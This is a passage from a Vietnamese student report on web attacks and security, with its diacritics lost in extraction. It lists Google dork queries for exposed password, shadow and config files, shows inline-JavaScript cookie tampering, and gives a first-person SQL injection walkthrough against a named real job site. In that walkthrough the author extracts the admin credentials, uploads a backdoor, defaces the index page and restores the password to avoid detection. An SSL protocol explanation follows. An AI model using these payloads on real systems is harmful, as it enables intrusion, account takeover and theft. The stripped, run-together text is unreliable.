C php site: gii hn Google chtruy vn nhng tkha xc nh trong mtsite hoc tn min ring bit. V d: exploits site:hackingspirits.com (khng
c ngoc kp) stm kim tkha exploits trong nhng trang hin c trongtt ccc link ca tn min hackingspirits.com. Khng c khong trng nogia site: v tn min.
[ filetype: ]
C php filetype: gii hn Google chtm kim nhng files trn internet cphn m rng ring bit (V d: doc, pdf hay ppt v.v...). V d: filetype:docsite:gov confidential (khng c ngoc kp) stm kim nhng file c phn mrng l .doc trong tt c nhng tn min ca chnh phc phn m rng l
.gov v cha tconfidential(b mt) trong trang hoc trong file .doc. V d
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
21/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
21
. Kt qu s bao gm nhng lin kt n tt ccc file vn bn b trn ccsite ca chnh ph.
[ link: ]
C php link: s lit k nhng trang web m c cc lin kt n n nhngtrang web chnh. V d :chui link:SecurityFocus s lit k nhng trang web c lin kt trn trangch SecurityFocus.Ch khng c khong trng gia "link:" v URL ca trang Web.
[ related: ]
C php related: s lit k cc trang Web "tng t" vi trang Web chnh.
V d :related:www.securityfocus.com s lit k cc trang web tng t vi trangch Securityfocus. Nh rng khng c khong trng gia "related:" v URLca trang Web.
[ cache: ]
Truy vn cache: s cho kt qul phin bn ca trang Web m m Google lu li. V d:cache:Hackingspirits scho ra trang lu li bi Google's.Nh rng khng c khong trng gia "cache:" v URL ca trang web.
Nu bn bao gm nhng tkhc trong truy vn, Google sim sng nhngtny trong vn bn c lu li.V d: cache:Hackingspiritsguest scho ra vn bn c lu li c t"guest" c im sng.
[ intext: ]
C php intext: tm kim cc t trong mt website ring bit. N pht lcclin kt hoc URL v tiu ca trang.V d: intext:exploits (khng c ngoc kp) s cho kt qul nhng lin kt
n nhng trang web c tkha tm kim l "exploits" trong cc trang ca n.
[ phonebook: ]
phonebook tm kim thng tin vcc a chng ph Mv sinthoi.
V d:phonebook:Lisa+CA s lit k tt ccc tn ngi c tLisa trong tn vCalifornia (CA). C php ny c thc s dng nh l mt cng c
http://www.securityfocus.com/http://www.securityfocus.com/http://www.securityfocus.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.hackingspirits.com/http://www.securityfocus.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
22/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
22
tuyt vi ca tin tc trong trng hp ai mun tm kim thng tin c nhncho cng vic x hi.
Truy vn cc site hoc server d b tn cng s dng cc c phpnng cao ca Google
S dng c php Index of tm kim cc site chophp duytch mcDi y l vi V d s dng c c quyn truy cp vo rtnhiu thng tin nhy cm ddng hn rt nhiu:
Index of /admin
Index of /passwd
Index of /password
Index of /mail
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs""Index of /config"
Tm kim cc site hoc server d b tn cng s dng c phpinurl: hoc allinurl:
a. S dng allinurl:winnt/system32/ (khng c ngoc kp) s lit ktt ccc lin kt n server m cho php truy cp n nhng th mc giihn nh system32 qua web. Nu bn may mn th bn c thc quyntruy cp n file cmd.exe trong th mc system32. Mt khi bn c quyntruy cp n file cmd.exe v c th thc thi n th bn c th tin ln xa hnleo thang quyn ca bn khp server v lm hi n.
b. S dng allinurl:wwwboard/passwd.txt(khng c ngoc kp) trongGoogle search s lit k tt ccc lin kt n server m d b tn cng votnh d b tn cng mt khu WWWBoard. bit thm vtnh d b tncng ny bn c thvo link sau y:http://www.securiteam.com/exploits/2BUQ4S0SAW.html
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
23/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
23
c. S dng inurl:.bash_history (khng c ngoc kp) s lit k tt ccc linkt n server m cho php truy cp vo file.bash_history qua web. y lmt file lch sdng lnh. File ny bao gm danh sch cc lnh c thc thibi qun trvin, v i khi bao gm cthng tin nhy cm nh mt khu g
vo bi qun trvin. Nu file ny blm hi v nu n bao gm mt khu m ha ca h thng unix (or *nix) th n c th ddng b crack bi phngphp John The Ripper.
d. S dng inurl:config.txt (khng c ngoc kp) s lit k tt ccc lin ktn cc my chcho php truy cp vo file config.txt qua giao din web. Fileny bao gm cc thng tin nhy cm, bao gm gi tr bbm ra ca mt khuqun trv sxc thc quyn truy cp c s d liu. V d: H thng qun l
hc tp Ingenium l mt ng dng Web cho cc h thng Windows pht trinbi Click2learn, Inc. H thng qun l hc tp Ingenium phin bn 5.1 v 6.1lu cc thng tin nhy cm khng an tan trong file config.txt. bit thmthng tin vo lin kt sau:http://www.securiteam.com/securitynews/6M00H2K5PG.html
Nhng tm kim tng tkhc dng inurl: hoc allinurl: kt hp vicc c php khc:inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txtinurl:webeditor.php
inurl:file_upload.php
inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
Tm kim cc site hoc server d b tn cng dng intitle: hocallintitle:
a. S dng [allintitle: "index of /root] (khng c ngoc vung) s lit k cc
lin kt n cc webserver(my chWeb) cho php truy cp vo cc th mcgii hn nh root qua giao din web. Th mc ny i khi bao gm cc
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
24/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
24
thng tin nhy cm m c th ddng tm c tqua nhng yu cu Webn gin.
b. S dng [allintitle: "index of /admin] (khng c ngoc vung) s lit k cc
lin kt n cc website cho php duyt chmc cc th mc gii hn nhadmin qua giao din web. Hu ht cc ng dng web i khi s dng tnnh admin lu quyn admin trong . Th mc ny i khi bao hm ccthng tin nhy cm m c th ddng tm c qua cc yu cu Web ngin.
Nhng tm kim tng tdng intitle: hoc allintitle: kt hp vicc c php khcintitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accountsintitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
tm nhng site dbtn cng bng phng php Cross-SitesScripting (XSS):
allinurl:/scripts/cart32.exeallinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php
tm nhng site dbtn cng bng phng php SQL Injection:allinurl:/privmsg.php
allinurl:/privmsg.php
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
25/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
25
3. S dng cu lnh JavaScript Inline
Mnh s gii thiu vi cc bn vk thut hack web chdng JavaScript. Vik thut ny, bn c thxem xt v hiu chnh gi tr ca cc cookie hoc
trng n trc tip ngay trn trang web. Tt c chvi mt trnh duyt web htr "debug javascript-inline", chng hn nh Internet Explorer, Netscape hayMozilla, ... C bn v JavaScript-Inline
a scc trnh duyt web u h tr JavaScript-Inline.Bn c ththi hnh JavaScript bng cch g vo thanh URL nh sau:
Code:
javascript:void()
V d:
xem gi tr hin ti ca cookie bn g :Code:
javascript:alert(document.cookie)
Hoc thay i gi tr ca trng n "hiddenid" ca form u tin thnh "2", bng:Code:
javascript:void(document.forms[0].hiddenid.value="2")
M ngun HTML c on nh sau:...
Code:
var a=unescape("%43%4f%44%45%5a");
function check()
{
if (document.a.c.value == a)
{
document.location.href="http://scifi.pages.at/hackits/"+document.a.c.value+".htm";
}
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
26/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
26
else
{
alert ("wrong! - letter size?");
}
}
}
n gin bn c th g thng vo thanh URL ca IE nh sau:Code:
javascript:alert(unescape(a)) ly password ca level tip theo("CODEZ")
Realistic mission 8 trn hackthisite.org yu cu bn chuyn 10 triu t tikhon ca "Gary Hunter" vo ti khon "dropCash".Sau khi bn dng SQL-Injection ly username ca "Gary Hunter", bn tinhnh chuyn tin nh sau:
ng nhp vo ti khon ca bn. Trn thanh URL ca IE bn g vo:
Code:javascript:void(document.write('< name="the_" ="movemoney.php" method="post">< value="dropCash"name="TO" ="">< value="10000000" name="AMOUNT" ="">'))
on JavaScript trn s to mt form vi trng nCode:
FROM=GaryWilliamHunter, TO=dropCash, AMOUNT=10000000
By gi bn thay i cookie li nh sau:Code:
javascript:void(document.cookie="accountUsername=G aryWilliamHunter")
javascript:void(document.cookie="accountPassword=G aryWilliamHunter")
n nt "Move Money To A Different Account" mt ci l xong.
Mnh ngh rt c kh nng l mission 8 to mt session("LoggedIn").
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
27/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
27
Mi ln chng ta ng nhp vo n s t session("LoggedIn")=1. Chng tach cn thay i li gi tr ca cookie v trng n thc hin vic chuyntin trong session ca chng tav n ch kim tra sesion("LoggedIn")=1 m khng kim tra username thc sl ai.
V d cui cng, mnh s trnh by v cch hack trang webhttp://www.mangvieclam.com/..Mnh gi li nhn cho admin ca mangvieclam.com nhng chng thy linlc vi mnh fix li. Hihi, ci "message" ca mnh cui trang index.asptrn mangvieclam.com cha thy ai xa ht.
Sau khi ng nhp vo mangvieclam.com, bn g vo thanh URL dngjavascript:alert(document.cookie) xem cookie.
Ban c th thay i thng tin c nhn ca mt user bt k trnmangvieclam.com bng cch i li cookie username nh sau:javascript:void(document.cookie="username=tn user"), sau chn mc"Cp nhp thng tin"
Bn cng c th thay i password ca mt user bt k trn mangvieclam.comsau khi login vo vi account ca mnh nh sau: chn mc "Thay i mtkhu", g dng javascript:void(document.cookie="username=tnuser"+escape("' or '1'='1")) vo thanh URL, nhp password c l g cng cv password mi, sau n nt "Thay i mt khu".
Li ny nm trong file icl/filerec/detail.asp, dng th 43..65. V d, khi bn setcookie username l "trungkien' or '1'='1", cc cu lnh SQL sau s c thcthi:
Select Count(UserID) As Check From tblUserInfo Where UserID = 'trungkien'or '1'='1' And Passwords='md5(password c sai)' And Active = 1982 // lun trv true do iu kin or '1'='1' ng mc d password c sai
Update tblUserInfo Set Passwords = 'md5(password mi)' Where UserID ='trungkien' or '1'='1' And Active = 1982 // lun set password mi cho user"trungkien" do iu kin UserID = 'trungkien' ng trc iu kin '1'='1'
Rt tic l li ny khng th khai thc trnLINK :http://www.mangvieclam.com/do li lp trnh.
Select Count(UserID) As Check From tblUserInfo Where UserID = N'trungkien'
or '1'='1' And Passwords = N'...' And Active = 1982
http://www.mangvieclam.com/http://www.mangvieclam.com/http://www.mangvieclam.com/http://www.mangvieclam.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
28/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
28
Tuy nhin, websiteLINK :http://www.mangvieclam.com/dng CSDL MS-SQL nn mnh d dng ly c username v password caadmin t tblConfig nh sau:
u tin mnh ly username bngjavascript:void(document.cookie="username="+escape ("' or1=convert(int,(select adminid from tblconfig where accid=1))--"))
Chn mc "Cp nhp thng tin"
Tn ng nhp ca admin l 'ngtuan'
Tng t mnh ly password ca admin bngCode:
javascript:void(document.cookie="username="+escape ("' or1=convert(int,(select adminpass from tblconfig where accid=1))--"))
By gi mnh t li password mi l 'hacked'
HTMLCode:
username:
password:
Upload backdoor v thay i trang index.asp. Sau restore li pasword ccho admin trnh b pht hin:
http://www.mangvieclam.com/http://www.mangvieclam.com/ -
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
29/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
29
javascript:void(document.cookie="username="+escape ("';update tblconfig set
adminpass='...' where accid=1--"))
Mt gii php cho mangvieclam.com l bn nn chuyn binRequest.Cookies("UserName") thnh bin phin Session("UserName") trnh b gi mo username nh trn.
4. DDOS: Cha tm hiu
III. Mt scch bo mt cho website
1. SSL(Secure Socket Layer)
1.1 Gii thiu v SSL
Nh chng ta bit c hai giao thc bo mt quan trng lp vn
chuyn (Layer Transport) c tm quan trng cao nht i vi s bo mt ca
cc trnh ng dng trn Web: l hai giao thc SSL v TLS.
Ni chung, c mt s khnng bo v bng mt m lu lng d
liu HTTP. V d, vo nhng nm 1990, tp on CommerceNet xut S-HTTP m vc bn l mt ci tin bo mt ca HTTP. Mt phn thc thi ca
S-HTTP lm cho c sn cng cng trong mt phin bn c chnh sa
ca trnh duyt Mosaic NCSA m nhng ngi dng phi mua (tri vi trnh
duyt Mo NCSA "chun" c sn cng cng v min ph trn Internet).
Tuy nhin, cng thi im Netscape Communication gii thiu SSL
v mt giao thc tng ng vi phin bn u tin ca Netscape Navigator,
Tri vi tp on CommerceNet, Netscape Communications khng tnh ph
cckhch hng ca n v vic thc thi giao thc bo mt ca n. Kt qu,
SSL trthnh giao thc ni bt cung cp cc dch v bo mt cho lu
lng d liu HTTP 1994 v S-HTTP lng l bin mt.
1.2 Cu trc ca giao thc SSL:
Cu trctrc ca SSL v giao thc SSL tng ng c minh ha
trong hnh 1.1(Cu trc SSL v giao thc SSL). Theo hnh ny, SSL m ch
mt lp (bo mt) trung gian gia lp vn chuyn (Transport Layer) v lp
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
30/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
30
ng dng (Application Layer). SSL c xp lp ln trn mt dch v vn
chuyn nh hng ni kt v ng tin cy, chng hn nh c cung cp
bi TCP. V khnng, n c th cung cp cc dch v bo mt cho cc giao
thc ng dng ty da vo TCP chkhng chHTTP. Thc t, mt uim chnh ca cc giao thc bo mt lp vn chuyn (Transport layer) ni
chung v giao thc SSL ni ring l chng c lp vi ng dng theo ngha l
chng c thc s dng bo v bt k giao thc ng dng c xp
lp ln trn TCP mt cch trong sut. Hnh 1.1 minh ha mt s giao thc
ng dng in hnh bao gm NSIIOP, HTTP, FTP, Telnet, IMAP, IRC, v
POP3. Tt cchng c thc bo v bng cch xp ln chng ln trn
SSL (mu tS c thm vo trong cc tghp giao thc tng ng ch
nh vic s dng SSL). Tuy nhin, ch rng SSL c mt nh hng client-
server mnh mv tht skhng p ng cc yu cu ca cc giao thc
ng dng ngang hng.
Cu trc ca SSL v giao thc SSL
Tm li, giao thc SSL cung cp s bo mt truyn thng vn c ba
c tnh c bn:
1. Cc bn giao tip (ngha l client v server) c thxc thc nhau bng
cch s dng mt m kha chung.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
31/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
31
2. Sb mt ca lu lng d liu c bo vv ni kt c m ha
trong sut sau khi mt s thit lp quan hban u v sthng lng kha
session xy ra.
3. Tnh xc thc v tnh ton vn ca lu lng d liu cng c bo vv cc thng bo c xc thc v c kim tra tnh ton vn mt cch
trong sut bng cch s dng MAC.
Tuy nhin, iu quan trng cn lu l SSL khng ngn cc cuc tn cng
phn tch lu lng. V d, bng cch xem xt cc a chIP ngun v ch
khng c m ha v cc s cng TCP, hoc xem xt lng d liu c
truyn, mt ngi phn tch lu lng vn c thxc nh cc bn no ang
tng tc, cc loi dch vang c s dng, v i khi ngay cdnh c
thng tin vcc mi quan h doanh nghip hoc c nhn. Hn na, SSL
khng ngn cc cuc tn cng c nh hng da vo phn thc thi TCP,
chng hn nh cc cuc tn cng lm trn ngp TCP SYN hoc cng ot
session.
s dng s bo v SSL, c client ln server phi bit rng pha bn
kia ang s dng SSL. Ni chung, c ba khnng gii quyt vn ny:
1. S dng cc s cng chuyn dng c dnh ring bi Internet
Asigned Numbers Authority (IANA). Trong trng hp ny, mt s cng ring
bit phi c gn cho mi giao thc ng dng vn s dng SSL.
2. S dng s cng chun cho mi giao thc ng dng v thng
lng cc ty chn bo mt nh l mt phn ca giao thc ng dng .
3. S dng mt ty chn TCP thng lng vic s dng mt giao
thc bo mt, chng hn nh SSL trong sut giai on thit lp ni kt TCP
thng thng.
S thng lng dnh ring cho ng dng ca cc ty chn bo mt
(ngha l khnng thhai) c khuyt im l i hi mi giao thc ng dng
c chnh sa hiu tin trnh thng lng. Ngoi ra, vic xc nh mt
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
32/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
32
ty chn TCP (ngha l khnng thba) l mt gii php tt, nhng khng
c tho lun nghim tc cho n by gi. Thc t, cc s cng ring bit
c dnh ring v c gn bi IANA cho mi giao thc ng dng vn
c th chy trn SSL hoc TLS (ngha l khnng th nht). Tuy nhin, hych vic s dng cc s cng ring bit cng c khuyt im l i hi hai
ni kt TCP nu client khng bit nhng g m server h tr. Trc tin, client
phi ni kt vi cng an ton v sau vi cng khng an ton hay ngc
li. Rt c thcc giao thc sau ny s hy bphng php ny v tm kh
nng thhai. V d, SALS (Simple Authentication v Security Layer) xc nh
mt ph hp thm s h trxc thc vo cc giao thc ng dng da vo
kt ni. Theo thng s k thut SALS, vic s dng cc c chxc thc c
ththng lng gia client v Server ca mt giao thc ng dng cho .
Cc s cng c gn bi IANA cho cc giao thc ng dng vn chy trn
SSL/TLS c tm tt trong bng 1.2 v c minh ha mt phn trong hnh
1.1. Ngy nay, "S" chnh vic s dng SSL c thm (hu t) nht qun
vo cc tghp ca cc giao thc ng dng tng ng (trong mt s thut
ng ban u, S c s dng v c thm tin t mt cch khng nht
qun v mt s tghp).
Cc s cng c gn bi IANA cho cc giao thc ng dng vn chy
trn SSL/TLS c tm tt trong bng 1.2 v c minh ha mt phn trong
hnh 1.1. Ngy nay, "S" chnh vic s dng SSL c thm (hu t) nht
qun vo cc tghp ca cc giao thc ng dng tng ng (trong mt s
thut ngban u, S c s dng v c thm tin t mt cch khngnht qun v mt s tghp).
1.3 SSL Record Protocol:
SSL Record Protocol nhn d liu tcc giao thc con SSL lp cao hn v
xl vic phn on, nn, xc thc v m ha d liu. Chnh xc hn, giao
thc ny ly mt khi d liu c kch cty lm d liu nhp v ta mt lot
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
33/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
33
cc on d liu SSL lm d liu xut (hoc cn c gi l cc bn ghi) nh
hn hoc bng 16,383 byte.
Cc bc SSL Record Protocol.
Cc bc khc nhau ca SSL Record Protocol vn i t mt on d liu th
n mt bn ghi SSL Plaintext (bc phn on), SSL Compressed (bc
nn) v SSL Ciphertext (bc m ha) c minh ha trong hnh 1.5. Sau
cng, mi bn ghi SSL cha cc trng thng tin sau y:
- Loi ni dung;
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
34/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
34
- Sphin bn ca giao thc;
- Chiu di;
- Ti trng d liu (c nn v c m ha ty );
- MAC.Loi ni dung xc nh giao thc lp cao hn vn phi c s dng
sau xl ti trng d liu bn ghi SSL (sau khi gii nn v gii m ha
thchhp).
S phin bn ca giao thc xc nh phin bn SSL ang s dng
(thng l version3.0) Mi ti trng d liu bn ghi SSL c nn v c
m ha theo phng thc nn hin hnh v thng s mt m c xc nh
cho session SSL.
Lc bt u mi session SSL, phng php nn v thng s mt m
thng c xc nh l rng. Chai c xc lp trong sut qu trnh thc
thi ban u SSL Handshake Protocol. Sau cng, MAC c thm vo mi
bn ghi SSL. N cung cp cc dch vxc thc ngun gc thng bo v tnh
ton vn d liu. Tng tnh thut ton m ha, thut ton vn c s
dng tnh v xc nhn MAC c xc nh trong thng s mt m ca
trng thi session hin hnh. Theo mc nh, SSL Record Protocol s dng
mt cu trc MAC vn tng tnhng vn khc vi cu trc HMAC hn. C
ba im khc bit chnh gia cu trc SSL MAC v cu trc HMAC:
Cu trc SSL MAC c mt s chui trong thng bo trc khi hash ngn
cc hnh thc tn cng xem li ring bit.
Cu trc SSL MAC c chiu di bn ghi.Cu trc SSL MAC s dng cc ton t ghp, trong khi cu trc MAC s
dng moduloe cng 2. Tt c nhng im khc bit ny hin hu ch yu v
cu trc SSL MAC c s dng trc cu trc HMAC trong hu nh tt c
thng s k thut giao thc bo mt Internet. Cu trc HMAC cng c s
dng cho thng s k thut giao thc TLS gn y hn.
Nh c minh ha trong hnh 1.5, mt s giao thc con SSL c xp
lp trn SSL Record Protocol. Mi giao thc con c th tham chiu n cc
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
35/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
35
loi thng bo c th vn c gi bng cch s dng SSL Record Protocol.
Thng s k thut SSL 3.0 xc nh ba giao thc SSL sau y:
- Alert Protocol;
- Handshake Protocol;- ChangeCipherSpec Protocol;
Tm li, SSL Alert Protocol c s dng chuyn cc cnh bo thng qua
SSL Record Protocol. Mi cnh bo gm 2 phn, mt mc cnh bo v mt
m t cnh bo.
SSL Handshake Protocol l giao thc con SSL chnh c s dng h tr
xc thc client v server v trao i mt kha session. Do SSL
Handshake Protocol trnh by tng quan v c tho lun trong phn tip
theo.
Sau cng, SSL ChangeCipherSpec Protocol c s dng thay i gia
mt thng s mt m ny v mt thng s mt m khc. Mc d thng s mt
m thng c thay i cui mt s thit lp quan hSSL, nhng n
cng c thc thay i vo bt k thi im sau .
Ngoi nhng giao thc con SSL ny, mt SSL Application Data Protocol c
s dng chuyn trc tip d liu ng dng n SSL Record Protocol.
SSL Handshake Protocol:
SSL Handshake Protocol l giao thc con SSL chnh c xp lp trn
SSL Record Protocol. Kt qu, cc thng bo thit lp quan h SSL c
cung cp cho lp bn ghi SSL ni chng c bao bc trong mt hoc nhiu
bn ghi SSL vn c xl v c chuyn nh c xc nh bi phngphp nn v thng s mt m ca session SSL hin hnh v cc kha mt
m ca ni kt SSL tng ng. Mc ch ca SSL Handshake Protocol l yu
cu mt client v server thit lp v duy tr thng tin trng thi vn c s
dng bo vcc cuc lin lc. C thhn, giao thc phi yu cu client v
server chp thun mt phin bn giao thc SSL chung, chn phng thc
nn v thng s mt m, ty xc thc nhau v to mt kha mt chnh m
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
36/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
36
t cc kha session khc nhau dnh cho vic xc thc v m ha thng
bo c thc dn xut t.
Tm li, vic thc thi SSL Handshake Protocol gia mt client C v mt
server S c thc tm tt nh sau (cc thng bo c t trong cc dungoc vung th ty ):
1: C -> S: CLIENTHELLO
2: S -> C: SERVERHELLO
[CERTIFICATE]
[SERVERKEYEXCHANGE]
[CERTIFICATEREQUEST]
SERVERHELLODONE
3: C -> [CERTIFICATE]
CLIENTKEYEXCHANGE
[CERTIFICATEVERIFY]
CHANGECIPHERSPEC
FINISHED
4: S -> C: CHANGECIPHERSPEC
FINISHED
Khi Client C mun kt ni vi server S, n thit lp mt ni kt TCP vi cng
HTTPS (vn khng c a vo phn m t giao thc) v gi mt thng
bo CLIENTHELLO n server bc 1 ca s thc thi SSL Handshake
Protocol. Client cng c th gi mt thng bo CLIENTHELLO nhm phn hi
li mt thng bo HELLOREQUEST hoc ch ng thng lng li cc
tham s bo mt ca mt ni kt hin c. Thng bo CLIENTHELLO bao gmcc trng sau y:
- S ca phin bn SSL cao nht c biu hin bi client (thng l 3.0).
- Mt cu trc ngu nhin do client to ra gm mt tem thi gian 32 bit c
dng UNIX chun v mt gi tr28 byte c to ra bi mt b to s gi
ngu nhin.
- Mt nh danh session m client mun s dng cho ni kt ny.
- Mt danh schcc b mt m client h tr.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
37/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
37
- Mt danh sch cc phng php nn m client h tr.
Ch rng trng session identity (nh danh session) nn rng nu sessionSSL hin khng tn ti hoc nu client mun to cc tham s bo mt mi.
mt trong hai trng hp, mt trng session identity khng rng l xc nh
mt session SSL hin c gia client v server (ngha l mt session c cc
tham s bo mt m client mun s dng li.). nh danh session c th bt
ngun t mt ni kt trc , ni kt ny hoc mt ni kt ang hot ng.
Cng ch rng danh sch cc b mt m c h tr, c chuyn t
client n server trong thng bo CLIENTHELLO, cha cc t hp thut ton
mt m c h tr bi client theo th tu tim. Mi b mt m xc nh
mt thut ton trao i kha v mt thng bo mt m. Server s chn mt b
mt m hoc nu cc la chn c th chp nhn c khng c trnh by,
tr v mt thng bo li v ng ni kt mt cch ph hp. Sau khi gi
thng bo CLIENTHELLO, client i mt thng bo SERVERHELLO. Bt k
thng bo khc c tr v bi server ngoi tr mt thng bo
HELLOREQUEST c xem nh l mt li vo thi im ny.
bc 2, server xl thng bo CLIENTHELLO v p ng bng mt thng
bo li hoc thng bo SERVERHELLO. Tng t nh thng bo
CLIENTHELLO, thng bo SERVERHELLO c cc trng sau y:
- Mt sphin bn server cha phin bn thp hn ca phin bn c
ngh bi client trong thng bo CLIENTHELLO v c h tr cao nht bi
Server.
- Mt cu trc ngu nhin do server to ra cng gm mt tem thi gian 32bit
c dng UNIX chun v mt gi tr28bit c to ra bi mt b to s ngu
nhin.
- Mt nh danh session tng ng vi ni kt ny.
- Mt b mt m c chn t bi server tdanh sch cc b mt m c
h tr bi client.
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
38/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
38
- Mt phng php nn c chn bi server tdanh sch cc thut ton
nn c h tr bi client.
Nu nh danh session trong thng bo CLIENTHELLO khng rng, server
tm trong cache session ca n nhm tm ra mt mc tng hp. Nu mctng hp c tm thy v server mun thit lp ni kt mi bng cch s
dng trng thi session tng ng, server p ng bng cng mt gi trnh
c cung cp bi client. Chn ny l mt session c tip tc li v xc
nh rng c hai pha phi tin hnh trc tip vi cc thng bo
CHANGECIPHERSPEC v FINISHED c trnh by thm bn di. Nu
khng, trng ny cha mt gi trkhc nhn bit mt session mi. Server
cng c th tr v mt trng nh danh session rng biu th rng session
skhng c lu trv do khng thc tip tc sau . Cng ch
rng trong thng bo SERVERHELLO, server chn mt b mt m v mt
phng php nn tcc danh sch c cung cp bi client trong thng bo
CLIENTHELLO. Cc thut ton trao i kha, xc thc, m ha v xc thc
thng bo c xc nh bi bm c chn bi server v c lm l ra
trong thng bo SERVERHELLO. Cc b mt m vn c xc nh trong
giao thc SSL vc bn ging nh b mt m xc nh cho TLS (nh
c tm tt cc bn 1.4 n 1.7 trong nhng bi vit trc).
Ngoi thng bo SERVERHELLO, server cng phi gi cc thng bo khc
n client. V d, nu server s dng s xc thc da vo chng nhn,
server gi chng nhn site ca n n client trong mt thng bo
CERTIFICATE tng ng. Chng nhn phi thch hp cho thut ton trao i
kha ca b mt m c chn v thng l mt chng nhn X.509v3. Cngloi thng bo sc s dng sau cho sp ng ca client i vi
thng bo sc s dng sau cho sp ng ca client i vi thng
bo CERTIFICATERequest ca server. Trong trng hp ca cc chng
nhn X.509v3, mt chng nhn c th thc s tham chiu n ton b mt
chui cc chng nhn, c sp xp theo th t vi chng nhn ca i
tng gi trc tin theo sau l bt k chng nhn CA tin hnh theo trnh t
hng n mt CA gc (vn s c chp nhn bi client).
-
8/8/2019 DA Tim HieuTan Cong Va Bao Mat Web - Duong Hoang Dai - NguyenTuanDat
39/98
n mn hc Lp trnh web ti: Tm hiu v Tn cng v Bo mt website
39
Tip theo, server c th gi mt thng bo SERVERKEYEXCHANGE n
client nu n khng c chng nhn, mt chng nhn vn c th c s
dng ch xc nhn cc chk k thut s hoc s dng thut ton trao i
kha da vo token FORITEZZA (KEA). R rng, thng bo ny khng cyu cu nu chng nhn site gm mt kha chung RSA vn c thc s
dng trong vic m ha. Ngoi ra, mt server khng nc danh c thty yu
cu mt chng nhn c nhn xc thc client. Do , n gi mt thng bo
CERTIFICATERequest n client. Thng bo ny cha mt danh sch cc
loi chng nhn c yu cu, c phn loi theo th tu tin ca server
cng nh mt danh sch cc tn c phn bit cho cc CA c th chp
nhn. cui bc 2, server gi mt thng bo SERVERHELLODone n
client ch nh s kt thc SERVERHELLO v cc thng bo i km.
Sau khi nhn SERVERHELLO v cc thng bo i km, client xc nhn rng
chng nhn site server (nu c cung cp) l hp lv kim tra nhm bo
m rng cc thng s bo mt c cung cp trong thng bo
SERVERHELLO c th c chp nhn. Nu server yu cu s xc thc
client, client gi mt thng bo CERTIFICATE vn cha mt chng nhn c
nhn cho kha chung ca ngi dng n server bc 3. Tip theo, client
gi mt thng bo CLIENTKEYEXCHANGE c dng ph thuc vo thut ton
cho mi kha c chn bi server:
- Nu RSA c s dng cho vic xc thc server v trao i kha, client to
mt kha mt tin chnh 48 byte, m ha n bng kha chung c tm thy
trong chng nhn site hoc kha RSA tm thi t thng bo
